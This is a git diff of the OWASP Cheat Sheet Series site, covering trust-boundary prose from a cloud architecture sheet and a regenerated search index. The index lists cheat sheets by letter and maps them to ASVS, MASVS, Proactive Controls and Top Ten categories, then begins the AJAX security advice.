Trust boundaries are connections between components within a system where a trust decision has to be made by the components. Another way to phrase it, this boundary is a point where two components with potentially different trust levels meet. These boundaries can range in scale, from the degrees of trust given to users interacting with an application, to trusting or verifying specific claims between code functions or components within a cloud architecture. Generally speaking however, trusting each component to perform its function correctly and securely, suffices. Therefore, trust boundaries likely will occur in the connections between cloud components, and between the application and third party elements, like end users and other vendors.

-

As an example, consider the architecture below. An API gateway connects to a compute instance (ephemeral or persistent), which then accesses a persistent storage resource. Separately, there exists a server which can verify the authentication, authorization and/or identity of the caller. This is a generic representation of an OAuth, IAM or directory system, which controls access to these resources. Additionally, there exists an Ephemeral IAM server which controls access for the stored resources (using an approach like the [IAM Access][#iam-access] section above). As shown by the dotted lines, trust boundaries exist between each compute component, the API gateway and the auth/identity server, even though many or all of the elements could be in the same application.

+

As an example, consider the architecture below. An API gateway connects to a compute instance (ephemeral or persistent), which then accesses a persistent storage resource. Separately, there exists a server which can verify the authentication, authorization and/or identity of the caller. This is a generic representation of an OAuth, IAM or directory system, which controls access to these resources. Additionally, there exists an Ephemeral IAM server which controls access for the stored resources (using an approach like the IAM Access section above). As shown by the dotted lines, trust boundaries exist between each compute component, the API gateway and the auth/identity server, even though many or all of the elements could be in the same application.

Trust Boundaries

Exploring Different Levels of Trust

Architects have to select a trust configuration between components, using quantative factors like risk score/tolerance, velocity of project, as well as subjective security goals. Each example below details trust boundary relationships to better explain the implications of trusting a certain resource. The threat level of a specific resource as a color from green (safe) to red (dangerous) will outline which resources shouldn't be trusted.

diff --git a/search/search_index.json b/search/search_index.json index 950257d75e..c29027143b 100644 --- a/search/search_index.json +++ b/search/search_index.json @@ -1 +1 @@ -{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"index.html","title":"Introduction","text":"

The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics. These cheat sheets were created by various application security professionals who have expertise in specific topics.

We hope that this project provides you with excellent security guidance in an easy to read format.

You can download this site here.

An ATOM feed is available here with the latest updates.

Project leaders:

Core team:

Project links:

"},{"location":"Glossary.html","title":"Index Alphabetical","text":"

85 cheat sheets available.

Icons beside the cheat sheet name indicate in which language(s) code snippet(s) are provided.

A B C D E F G H I J K L M N O P Q R S T U V W X

"},{"location":"Glossary.html#a","title":"A","text":"

Authentication Cheat Sheet.

Authorization Cheat Sheet.

AJAX Security Cheat Sheet.

Attack Surface Analysis Cheat Sheet.

Access Control Cheat Sheet.

Authorization Testing Automation Cheat Sheet.

Abuse Case Cheat Sheet.

"},{"location":"Glossary.html#b","title":"B","text":"

Bean Validation Cheat Sheet.

"},{"location":"Glossary.html#c","title":"C","text":"

Credential Stuffing Prevention Cheat Sheet.

Cryptographic Storage Cheat Sheet.

Content Security Policy Cheat Sheet.

Choosing and Using Security Questions Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

Cross Site Scripting Prevention Cheat Sheet.

C-Based Toolchain Hardening Cheat Sheet.

Clickjacking Defense Cheat Sheet.

"},{"location":"Glossary.html#d","title":"D","text":"

Denial of Service Cheat Sheet.

DOM based XSS Prevention Cheat Sheet.

Django REST Framework Cheat Sheet.

DOM Clobbering Prevention Cheat Sheet.

Deserialization Cheat Sheet.

Docker Security Cheat Sheet.

Database Security Cheat Sheet.

DotNet Security Cheat Sheet.

"},{"location":"Glossary.html#e","title":"E","text":"

Error Handling Cheat Sheet.

"},{"location":"Glossary.html#f","title":"F","text":"

File Upload Cheat Sheet.

Forgot Password Cheat Sheet.

"},{"location":"Glossary.html#g","title":"G","text":"

GraphQL Cheat Sheet.

"},{"location":"Glossary.html#h","title":"H","text":"

HTTP Headers Cheat Sheet.

HTML5 Security Cheat Sheet.

HTTP Strict Transport Security Cheat Sheet.

"},{"location":"Glossary.html#i","title":"I","text":"

Insecure Direct Object Reference Prevention Cheat Sheet.

Infrastructure as Code Security Cheat Sheet.

Input Validation Cheat Sheet.

Injection Prevention Cheat Sheet.

Injection Prevention in Java Cheat Sheet.

"},{"location":"Glossary.html#j","title":"J","text":"

JAAS Cheat Sheet.

Java Security Cheat Sheet.

JSON Web Token for Java Cheat Sheet.

"},{"location":"Glossary.html#k","title":"K","text":"

Kubernetes Security Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"Glossary.html#l","title":"L","text":"

Logging Vocabulary Cheat Sheet.

Laravel Cheat Sheet.

Logging Cheat Sheet.

LDAP Injection Prevention Cheat Sheet.

"},{"location":"Glossary.html#m","title":"M","text":"

Microservices Security Cheat Sheet.

Mass Assignment Cheat Sheet.

Microservices based Security Arch Doc Cheat Sheet.

Multifactor Authentication Cheat Sheet.

"},{"location":"Glossary.html#n","title":"N","text":"

Nodejs Security Cheat Sheet.

NodeJS Docker Cheat Sheet.

NPM Security Cheat Sheet.

Network Segmentation Cheat Sheet.

"},{"location":"Glossary.html#o","title":"O","text":"

OS Command Injection Defense Cheat Sheet.

"},{"location":"Glossary.html#p","title":"P","text":"

Pinning Cheat Sheet.

Prototype Pollution Prevention Cheat Sheet.

PHP Configuration Cheat Sheet.

Password Storage Cheat Sheet.

"},{"location":"Glossary.html#q","title":"Q","text":"

Query Parameterization Cheat Sheet.

"},{"location":"Glossary.html#r","title":"R","text":"

Ruby on Rails Cheat Sheet.

REST Assessment Cheat Sheet.

REST Security Cheat Sheet.

"},{"location":"Glossary.html#s","title":"S","text":"

SAML Security Cheat Sheet.

Secrets Management Cheat Sheet.

Session Management Cheat Sheet.

Securing Cascading Style Sheets Cheat Sheet.

SQL Injection Prevention Cheat Sheet.

Secure Cloud Architecture Cheat Sheet.

Server Side Request Forgery Prevention Cheat Sheet.

Secure Product Design Cheat Sheet.

"},{"location":"Glossary.html#t","title":"T","text":"

Transaction Authorization Cheat Sheet.

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

Third Party Javascript Management Cheat Sheet.

Threat Modeling Cheat Sheet.

"},{"location":"Glossary.html#u","title":"U","text":"

User Privacy Protection Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

"},{"location":"Glossary.html#v","title":"V","text":"

Virtual Patching Cheat Sheet.

Vulnerable Dependency Management Cheat Sheet.

Vulnerability Disclosure Cheat Sheet.

"},{"location":"Glossary.html#w","title":"W","text":"

Web Service Security Cheat Sheet.

"},{"location":"Glossary.html#x","title":"X","text":"

XSS Filter Evasion Cheat Sheet.

XS Leaks Cheat Sheet.

XML External Entity Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html","title":"ASVS Index","text":""},{"location":"IndexASVS.html#table-of-contents","title":"Table of Contents","text":""},{"location":"IndexASVS.html#objective","title":"Objective","text":"

The objective of this index is to help an OWASP Application Security Verification Standard (ASVS) user clearly identify which cheat sheets are useful for each section during his or her usage of the ASVS.

This index is based on the version 4.x of the ASVS.

"},{"location":"IndexASVS.html#v1-architecture-design-and-threat-modeling-requirements","title":"V1: Architecture, Design and Threat Modeling Requirements","text":""},{"location":"IndexASVS.html#v11-secure-software-development-lifecycle-requirements","title":"V1.1 Secure Software Development Lifecycle Requirements","text":"

Threat Modeling Cheat Sheet.

Abuse Case Cheat Sheet.

Attack Surface Analysis Cheat Sheet.

"},{"location":"IndexASVS.html#v12-authentication-architectural-requirements","title":"V1.2 Authentication Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v13-session-management-architectural-requirements","title":"V1.3 Session Management Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v14-access-control-architectural-requirements","title":"V1.4 Access Control Architectural Requirements","text":"

Docker Security Cheat Sheet.

"},{"location":"IndexASVS.html#v15-input-and-output-architectural-requirements","title":"V1.5 Input and Output Architectural Requirements","text":"

Abuse Case Cheat Sheet.

Deserialization Cheat Sheet.

"},{"location":"IndexASVS.html#v16-cryptographic-architectural-requirements","title":"V1.6 Cryptographic Architectural Requirements","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"IndexASVS.html#v17-errors-logging-and-auditing-architectural-requirements","title":"V1.7 Errors, Logging and Auditing Architectural Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v18-data-protection-and-privacy-architectural-requirements","title":"V1.8 Data Protection and Privacy Architectural Requirements","text":"

Abuse Case Cheat Sheet.

User Privacy Protection Cheat Sheet.

"},{"location":"IndexASVS.html#v19-communications-architectural-requirements","title":"V1.9 Communications Architectural Requirements","text":"

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

"},{"location":"IndexASVS.html#v110-malicious-software-architectural-requirements","title":"V1.10 Malicious Software Architectural Requirements","text":"

Third Party Javascript Management Cheat Sheet.

Virtual Patching Cheat Sheet.

"},{"location":"IndexASVS.html#v111-business-logic-architectural-requirements","title":"V1.11 Business Logic Architectural Requirements","text":"

Abuse Case Cheat Sheet.

"},{"location":"IndexASVS.html#v112-secure-file-upload-architectural-requirements","title":"V1.12 Secure File Upload Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v113-api-architectural-requirements","title":"V1.13 API Architectural Requirements","text":"

REST Security Cheat Sheet.

"},{"location":"IndexASVS.html#v114-configuration-architectural-requirements","title":"V1.14 Configuration Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v2-authentication-verification-requirements","title":"V2: Authentication Verification Requirements","text":""},{"location":"IndexASVS.html#v21-password-security-requirements","title":"V2.1 Password Security Requirements","text":"

Choosing and Using Security Questions Cheat Sheet.

Forgot Password Cheat Sheet.

Credential Stuffing Prevention Cheat Sheet

"},{"location":"IndexASVS.html#v22-general-authenticator-requirements","title":"V2.2 General Authenticator Requirements","text":"

Authentication Cheat Sheet.

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

"},{"location":"IndexASVS.html#v23-authenticator-lifecycle-requirements","title":"V2.3 Authenticator Lifecycle Requirements","text":"

None.

"},{"location":"IndexASVS.html#v24-credential-storage-requirements","title":"V2.4 Credential Storage Requirements","text":"

Password Storage Cheat Sheet.

"},{"location":"IndexASVS.html#v25-credential-recovery-requirements","title":"V2.5 Credential Recovery Requirements","text":"

Choosing and Using Security Questions Cheat Sheet.

Forgot Password Cheat Sheet.

"},{"location":"IndexASVS.html#v26-look-up-secret-verifier-requirements","title":"V2.6 Look-up Secret Verifier Requirements","text":"

None.

"},{"location":"IndexASVS.html#v27-out-of-band-verifier-requirements","title":"V2.7 Out of Band Verifier Requirements","text":"

Forgot Password Cheat Sheet.

"},{"location":"IndexASVS.html#v28-single-or-multi-factor-one-time-verifier-requirements","title":"V2.8 Single or Multi Factor One Time Verifier Requirements","text":"

None.

"},{"location":"IndexASVS.html#v29-cryptographic-software-and-devices-verifier-requirements","title":"V2.9 Cryptographic Software and Devices Verifier Requirements","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"IndexASVS.html#v210-service-authentication-requirements","title":"V2.10 Service Authentication Requirements","text":"

None.

"},{"location":"IndexASVS.html#v3-session-management-verification-requirements","title":"V3: Session Management Verification Requirements","text":""},{"location":"IndexASVS.html#v31-fundamental-session-management-requirements","title":"V3.1 Fundamental Session Management Requirements","text":"

None.

"},{"location":"IndexASVS.html#v32-session-binding-requirements","title":"V3.2 Session Binding Requirements","text":"

Session Management Cheat Sheet.

"},{"location":"IndexASVS.html#v33-session-logout-and-timeout-requirements","title":"V3.3 Session Logout and Timeout Requirements","text":"

Session Management Cheat Sheet.

"},{"location":"IndexASVS.html#v34-cookie-based-session-management","title":"V3.4 Cookie-based Session Management","text":"

Session Management Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

"},{"location":"IndexASVS.html#v35-token-based-session-management","title":"V3.5 Token-based Session Management","text":"

JSON Web Token Cheat Sheet for Java.

REST Security Cheat Sheet.

"},{"location":"IndexASVS.html#v36-re-authentication-from-a-federation-or-assertion","title":"V3.6 Re-authentication from a Federation or Assertion","text":"

None.

"},{"location":"IndexASVS.html#v37-defenses-against-session-management-exploits","title":"V3.7 Defenses Against Session Management Exploits","text":"

Session Management Cheat Sheet.

Transaction Authorization Cheat Sheet.

"},{"location":"IndexASVS.html#v4-access-control-verification-requirements","title":"V4: Access Control Verification Requirements","text":""},{"location":"IndexASVS.html#v41-general-access-control-design","title":"V4.1 General Access Control Design","text":"

Access Control Cheat Sheet.

Authorization Testing Automation.

"},{"location":"IndexASVS.html#v42-operation-level-access-control","title":"V4.2 Operation Level Access Control","text":"

Insecure Direct Object Reference Prevention Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

Authorization Testing Automation.

"},{"location":"IndexASVS.html#v43-other-access-control-considerations","title":"V4.3 Other Access Control Considerations","text":"

REST Assessment Cheat Sheet.

"},{"location":"IndexASVS.html#v5-validation-sanitization-and-encoding-verification-requirements","title":"V5: Validation, Sanitization and Encoding Verification Requirements","text":""},{"location":"IndexASVS.html#v51-input-validation-requirements","title":"V5.1 Input Validation Requirements","text":"

Mass Assignment Cheat Sheet.

Input Validation Cheat Sheet.

"},{"location":"IndexASVS.html#v52-sanitization-and-sandboxing-requirements","title":"V5.2 Sanitization and Sandboxing Requirements","text":"

Server Side Request Forgery Prevention Cheat Sheet.

XSS Prevention Cheat Sheet.

DOM based XSS Prevention Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

"},{"location":"IndexASVS.html#v53-output-encoding-and-injection-prevention-requirements","title":"V5.3 Output encoding and Injection Prevention Requirements","text":"

XSS Prevention Cheat Sheet.

DOM based XSS Prevention Cheat Sheet.

HTML5 Security Cheat Sheet.

Injection Prevention Cheat Sheet.

Injection Prevention Cheat Sheet in Java.

Input Validation Cheat Sheet.

LDAP Injection Prevention Cheat Sheet.

OS Command Injection Defense Cheat Sheet.

Protect File Upload Against Malicious File.

Query Parameterization Cheat Sheet.

SQL Injection Prevention Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

Bean Validation Cheat Sheet.

XXE Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html#v54-memory-string-and-unmanaged-code-requirements","title":"V5.4 Memory, String, and Unmanaged Code Requirements","text":"

None.

"},{"location":"IndexASVS.html#v55-deserialization-prevention-requirements","title":"V5.5 Deserialization Prevention Requirements","text":"

Deserialization Cheat Sheet.

XXE Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html#v6-stored-cryptography-verification-requirements","title":"V6: Stored Cryptography Verification Requirements","text":""},{"location":"IndexASVS.html#v61-data-classification","title":"V6.1 Data Classification","text":"

Abuse Case Cheat Sheet.

User Privacy Protection Cheat Sheet.

"},{"location":"IndexASVS.html#v62-algorithms","title":"V6.2 Algorithms","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"IndexASVS.html#v63-random-values","title":"V6.3 Random Values","text":"

None.

"},{"location":"IndexASVS.html#v64-secret-management","title":"V6.4 Secret Management","text":"

Key Management Cheat Sheet.

"},{"location":"IndexASVS.html#v7-error-handling-and-logging-verification-requirements","title":"V7: Error Handling and Logging Verification Requirements","text":""},{"location":"IndexASVS.html#v71-log-content-requirements","title":"V7.1 Log Content Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v72-log-processing-requirements","title":"V7.2 Log Processing Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v73-log-protection-requirements","title":"V7.3 Log Protection Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v74-error-handling","title":"V7.4 Error Handling","text":"

Error Handling Cheat Sheet.

"},{"location":"IndexASVS.html#v8-data-protection-verification-requirements","title":"V8: Data Protection Verification Requirements","text":""},{"location":"IndexASVS.html#v81-general-data-protection","title":"V8.1 General Data Protection","text":"

None.

"},{"location":"IndexASVS.html#v82-client-side-data-protection","title":"V8.2 Client-side Data Protection","text":"

None.

"},{"location":"IndexASVS.html#v83-sensitive-private-data","title":"V8.3 Sensitive Private Data","text":"

None.

"},{"location":"IndexASVS.html#v9-communications-verification-requirements","title":"V9: Communications Verification Requirements","text":""},{"location":"IndexASVS.html#v91-communications-security-requirements","title":"V9.1 Communications Security Requirements","text":"

HTTP Strict Transport Security Cheat Sheet.

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

"},{"location":"IndexASVS.html#v92-server-communications-security-requirements","title":"V9.2 Server Communications Security Requirements","text":"

None.

"},{"location":"IndexASVS.html#v10-malicious-code-verification-requirements","title":"V10: Malicious Code Verification Requirements","text":""},{"location":"IndexASVS.html#v101-code-integrity-controls","title":"V10.1 Code Integrity Controls","text":"

Third Party Javascript Management Cheat Sheet.

"},{"location":"IndexASVS.html#v102-malicious-code-search","title":"V10.2 Malicious Code Search","text":"

None.

"},{"location":"IndexASVS.html#v103-deployed-application-integrity-controls","title":"V10.3 Deployed Application Integrity Controls","text":"

Docker Security Cheat Sheet.

"},{"location":"IndexASVS.html#v11-business-logic-verification-requirements","title":"V11: Business Logic Verification Requirements","text":""},{"location":"IndexASVS.html#v111-business-logic-security-requirements","title":"V11.1 Business Logic Security Requirements","text":"

Abuse Case Cheat Sheet.

"},{"location":"IndexASVS.html#v12-file-and-resources-verification-requirements","title":"V12: File and Resources Verification Requirements","text":""},{"location":"IndexASVS.html#v121-file-upload-requirements","title":"V12.1 File Upload Requirements","text":"

Protect File Upload Against Malicious File.

"},{"location":"IndexASVS.html#v122-file-integrity-requirements","title":"V12.2 File Integrity Requirements","text":"

Protect File Upload Against Malicious File.

Third Party Javascript Management Cheat Sheet.

"},{"location":"IndexASVS.html#v123-file-execution-requirements","title":"V12.3 File execution Requirements","text":"

None.

"},{"location":"IndexASVS.html#v124-file-storage-requirements","title":"V12.4 File Storage Requirements","text":"

None.

"},{"location":"IndexASVS.html#v125-file-download-requirements","title":"V12.5 File Download Requirements","text":"

None.

"},{"location":"IndexASVS.html#v126-ssrf-protection-requirements","title":"V12.6 SSRF Protection Requirements","text":"

Server Side Request Forgery Prevention Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

"},{"location":"IndexASVS.html#v13-api-and-web-service-verification-requirements","title":"V13: API and Web Service Verification Requirements","text":""},{"location":"IndexASVS.html#v131-generic-web-service-security-verification-requirements","title":"V13.1 Generic Web Service Security Verification Requirements","text":"

Web Service Security Cheat Sheet.

Server Side Request Forgery Prevention Cheat Sheet.

"},{"location":"IndexASVS.html#v132-restful-web-service-verification-requirements","title":"V13.2 RESTful Web Service Verification Requirements","text":"

REST Assessment Cheat Sheet.

REST Security Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

"},{"location":"IndexASVS.html#v133-soap-web-service-verification-requirements","title":"V13.3 SOAP Web Service Verification Requirements","text":"

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html#v134-graphql-and-other-web-service-data-layer-security-requirements","title":"V13.4 GraphQL and other Web Service Data Layer Security Requirements","text":"

None.

"},{"location":"IndexASVS.html#v14-configuration-verification-requirements","title":"V14: Configuration Verification Requirements","text":""},{"location":"IndexASVS.html#v141-build","title":"V14.1 Build","text":"

Docker Security Cheat Sheet.

"},{"location":"IndexASVS.html#v142-dependency","title":"V14.2 Dependency","text":"

Docker Security Cheat Sheet.

Vulnerable Dependency Management Cheat Sheet.

"},{"location":"IndexASVS.html#v143-unintended-security-disclosure-requirements","title":"V14.3 Unintended Security Disclosure Requirements","text":"

Error Handling Cheat Sheet.

"},{"location":"IndexASVS.html#v144-http-security-headers-requirements","title":"V14.4 HTTP Security Headers Requirements","text":"

Content Security Policy Cheat Sheet.

"},{"location":"IndexASVS.html#v145-validate-http-request-header-requirements","title":"V14.5 Validate HTTP Request Header Requirements","text":"

None.

"},{"location":"IndexMASVS.html","title":"MASVS Index","text":""},{"location":"IndexMASVS.html#table-of-contents","title":"Table of Contents","text":""},{"location":"IndexMASVS.html#objective","title":"Objective","text":"

The objective of this index is to help OWASP Mobile Application Security Verification Standard (MASVS) users clearly identify which cheat sheets are useful for each section during their usage of the MASVS.

This index is based on the version 1.x.x of the MASVS.

"},{"location":"IndexMASVS.html#v1-architecture-design-and-threat-modeling-requirements","title":"V1: Architecture, Design and Threat Modeling Requirements","text":"

Threat Modeling Cheat Sheet.

Abuse Case Cheat Sheet.

Attack Surface Analysis Cheat Sheet.

"},{"location":"IndexMASVS.html#v2-data-storage-and-privacy-requirements","title":"V2: Data Storage and Privacy Requirements","text":"

Password Storage Cheat Sheet.

Abuse Case Cheat Sheet.

User Privacy Protection Cheat Sheet.

Logging Cheat Sheet.

"},{"location":"IndexMASVS.html#v3-cryptography-requirements","title":"V3: Cryptography Requirements","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"IndexMASVS.html#v4-authentication-and-session-management-requirements","title":"V4: Authentication and Session Management Requirements","text":"

Authentication Cheat Sheet.

Authorization Cheat Sheet.

Session Management Cheat Sheet.

Transaction Authorization Cheat Sheet.

Access Control Cheat Sheet.

JSON Web Token Cheat Sheet for Java.

Credential Stuffing Prevention Cheat Sheet.

"},{"location":"IndexMASVS.html#v5-network-communication-requirements","title":"V5: Network Communication Requirements","text":"

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

HTTP Strict Transport Security Cheat Sheet.

REST Security Cheat Sheet.

Web Service Security Cheat Sheet.

"},{"location":"IndexMASVS.html#v6-environmental-interaction-requirements","title":"V6: Environmental Interaction Requirements","text":"

None.

"},{"location":"IndexMASVS.html#v7-code-quality-and-build-setting-requirements","title":"V7: Code Quality and Build Setting Requirements","text":"

Vulnerable Dependency Management Cheat Sheet.

Error Handling Cheat Sheet.

Deserialization Cheat Sheet.

Logging Cheat Sheet.

Insecure Direct Object Reference Prevention Cheat Sheet.

Input Validation Cheat Sheet.

Injection Prevention Cheat Sheet.

Injection Prevention Cheat Sheet in Java.

OS Command Injection Defense Cheat Sheet.

Query Parameterization Cheat Sheet.

SQL Injection Prevention Cheat Sheet.

XXE Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexMASVS.html#v8-resiliency-against-reverse-engineering-requirements","title":"V8: Resiliency Against Reverse Engineering Requirements","text":"

None.

"},{"location":"IndexProactiveControls.html","title":"Proactive Controls Index","text":""},{"location":"IndexProactiveControls.html#objective","title":"Objective","text":"

This cheatsheet will help users of the OWASP Proactive Controls identify which cheatsheets map to each proactive controls item. This mapping is based the OWASP Proactive Controls version 3.0 (2018).

"},{"location":"IndexProactiveControls.html#1-define-security-requirements","title":"1. Define Security Requirements","text":"

Abuse Case Cheat Sheet

Attack Surface Analysis Cheat Sheet

Threat Modeling Cheat Sheet

"},{"location":"IndexProactiveControls.html#2-leverage-security-frameworks-and-libraries","title":"2. Leverage Security Frameworks and Libraries","text":"

Clickjacking Defense Cheat Sheet

DotNet Security Cheat Sheet (A3 Cross Site Scripting)

PHP Configuration Cheat Sheet

Ruby on Rails Cheat Sheet (Tools)

Ruby on Rails Cheat Sheet (XSS)

Vulnerable Dependency Management Cheat Sheet

"},{"location":"IndexProactiveControls.html#3-secure-database-access","title":"3. Secure Database Access","text":"

DotNet Security Cheat Sheet (Data Access)

DotNet Security Cheat Sheet (A1 SQL Injection)

Query Parameterization Cheat Sheet

Ruby on Rails Cheat Sheet (SQL Injection)

SQL Injection Prevention Cheat Sheet

"},{"location":"IndexProactiveControls.html#4-encode-and-escape-data","title":"4. Encode and Escape Data","text":"

AJAX Security Cheat Sheet (Client Side)

Cross Site Scripting Prevention Cheat Sheet

DOM based XSS Prevention Cheat Sheet

Injection Prevention Cheat Sheet

Injection Prevention Cheat Sheet in Java

LDAP Injection Prevention Cheat Sheet

"},{"location":"IndexProactiveControls.html#5-validate-all-inputs","title":"5. Validate All Inputs","text":"

Bean Validation Cheat Sheet

Deserialization Cheat Sheet

DotNet Security Cheat Sheet (HTTP Validation and Encoding)

DotNet Security Cheat Sheet (A8 Cross site request forgery)

DotNet Security Cheat Sheet (A10 Unvalidated redirects and forwards)

Input Validation Cheat Sheet

Injection Prevention Cheat Sheet

Injection Prevention Cheat Sheet in Java

Mass Assignment Cheat Sheet

OS Command Injection Defense Cheat Sheet

File Upload Cheat Sheet

REST Security Cheat Sheet (Input Validation)

Ruby on Rails Cheat Sheet (Command Injection)

Ruby on Rails Cheat Sheet (Mass Assignment and Strong Parameters)

Unvalidated Redirects and Forwards Cheat Sheet

XML External Entity Prevention Cheat Sheet

Server Side Request Forgery Prevention Cheat Sheet

"},{"location":"IndexProactiveControls.html#6-implement-digital-identity","title":"6. Implement Digital Identity","text":"

Authentication Cheat Sheet

Choosing and Using Security Questions Cheat Sheet

DotNet Security Cheat Sheet (Forms authentication)

DotNet Security Cheat Sheet (A2 Weak Account management)

Forgot Password Cheat Sheet

JAAS Cheat Sheet

JSON Web Token Cheat Sheet for Java

Password Storage Cheat Sheet

REST Security Cheat Sheet (JWT)

Ruby on Rails Cheat Sheet (Sessions)

Ruby on Rails Cheat Sheet (Authentication)

SAML Security Cheat Sheet

Session Management Cheat Sheet

"},{"location":"IndexProactiveControls.html#7-enforce-access-controls","title":"7. Enforce Access Controls","text":"

Access Control Cheat Sheet

Authorization Testing Automation

Credential Stuffing Prevention Cheat Sheet

Cross-Site_Request_Forgery_Prevention_Cheat_Sheet

DotNet Security Cheat Sheet (A4 Insecure Direct object references)

DotNet Security Cheat Sheet (A7 Missing function level access control)

REST Security Cheat Sheet (Access Control)

Ruby on Rails Cheat Sheet (Insecure Direct Object Reference or Forceful Browsing)

Ruby on Rails Cheat Sheet (CSRF)

Insecure Direct Object Reference Prevention Cheat Sheet

Transaction Authorization Cheat Sheet

"},{"location":"IndexProactiveControls.html#8-protect-data-everywhere","title":"8. Protect Data Everywhere","text":"

Cryptographic Storage Cheat Sheet

DotNet Security Cheat Sheet (Encryption)

DotNet Security Cheat Sheet (A6 Sensitive data exposure)

TLS Cipher String Cheat Sheet

Transport Layer Protection Cheat Sheet

Key Management Cheat Sheet

HTTP Strict Transport Security Cheat Sheet

Pinning Cheat Sheet

REST Security Cheat Sheet (HTTPS)

Ruby on Rails Cheat Sheet (Encryption)

User Privacy Protection Cheat Sheet

"},{"location":"IndexProactiveControls.html#9-implement-security-logging-and-monitoring","title":"9. Implement Security Logging and Monitoring","text":"

REST Security Cheat Sheet (Audit Logs)

Logging Cheat Sheet

"},{"location":"IndexProactiveControls.html#10-handle-all-errors-and-exceptions","title":"10. Handle All Errors and Exceptions","text":"

REST Security Cheat Sheet (Error Handling)

Error Handling Cheat Sheet

"},{"location":"IndexTopTen.html","title":"OWASP Top Ten 2021 : Related Cheat Sheets","text":"

The OWASP Top Ten is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.

This cheat sheet will help users of the OWASP Top Ten identify which cheat sheets map to each security category. This mapping is based the OWASP Top Ten 2021 version.

"},{"location":"IndexTopTen.html#a012021-broken-access-control","title":"A01:2021 \u2013 Broken Access Control","text":""},{"location":"IndexTopTen.html#a022021-cryptographic-failures","title":"A02:2021 \u2013 Cryptographic Failures","text":""},{"location":"IndexTopTen.html#a032021-injection","title":"A03:2021 \u2013 Injection","text":""},{"location":"IndexTopTen.html#a042021-insecure-design","title":"A04:2021 \u2013 Insecure Design","text":""},{"location":"IndexTopTen.html#a052021-security-misconfiguration","title":"A05:2021 \u2013 Security Misconfiguration","text":""},{"location":"IndexTopTen.html#a062021-vulnerable-and-outdated-components","title":"A06:2021 \u2013 Vulnerable and Outdated Components","text":""},{"location":"IndexTopTen.html#a072021-identification-and-authentication-failures","title":"A07:2021 \u2013 Identification and Authentication Failures","text":""},{"location":"IndexTopTen.html#a082021-software-and-data-integrity-failures","title":"A08:2021 \u2013 Software and Data Integrity Failures","text":""},{"location":"IndexTopTen.html#a092021-security-logging-and-monitoring-failures","title":"A09:2021 \u2013 Security Logging and Monitoring Failures","text":""},{"location":"IndexTopTen.html#a102021-server-side-request-forgery-ssrf","title":"A10:2021 \u2013 Server-Side Request Forgery (SSRF)","text":""},{"location":"IndexTopTen.html#a112021-next-steps","title":"A11:2021 \u2013 Next Steps","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html","title":"AJAX Security Cheat Sheet","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This document will provide a starting point for AJAX security and will hopefully be updated and expanded reasonably often to provide more detailed information about specific frameworks and technologies.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#client-side-javascript","title":"Client Side (JavaScript)","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#use-innertext-instead-of-innerhtml","title":"Use .innerText instead of .innerHTML","text":"

The use of .innerText will prevent most XSS problems as it will automatically encode the text.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-use-eval-new-function-or-other-code-evaluation-tools","title":"Don't use eval(), new Function() or other code evaluation tools","text":"

eval() function is evil, never use it. Needing to use eval usually indicates a problem in your design.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#canonicalize-data-to-consumer-read-encode-before-use","title":"Canonicalize data to consumer (read: encode before use)","text":"

When using data to build HTML, script, CSS, XML, JSON, etc. make sure you take into account how that data must be presented in a literal sense to keep its logical meaning.

Data should be properly encoded before used in this manner to prevent injection style issues, and to make sure the logical meaning is preserved.

Check out the OWASP Java Encoder Project.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-rely-on-client-logic-for-security","title":"Don't rely on client logic for security","text":"

Don't forget that the user controls the client-side logic. A number of browser plugins are available to set breakpoints, skip code, change values, etc. Never rely on client logic for security.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-rely-on-client-business-logic","title":"Don't rely on client business logic","text":"

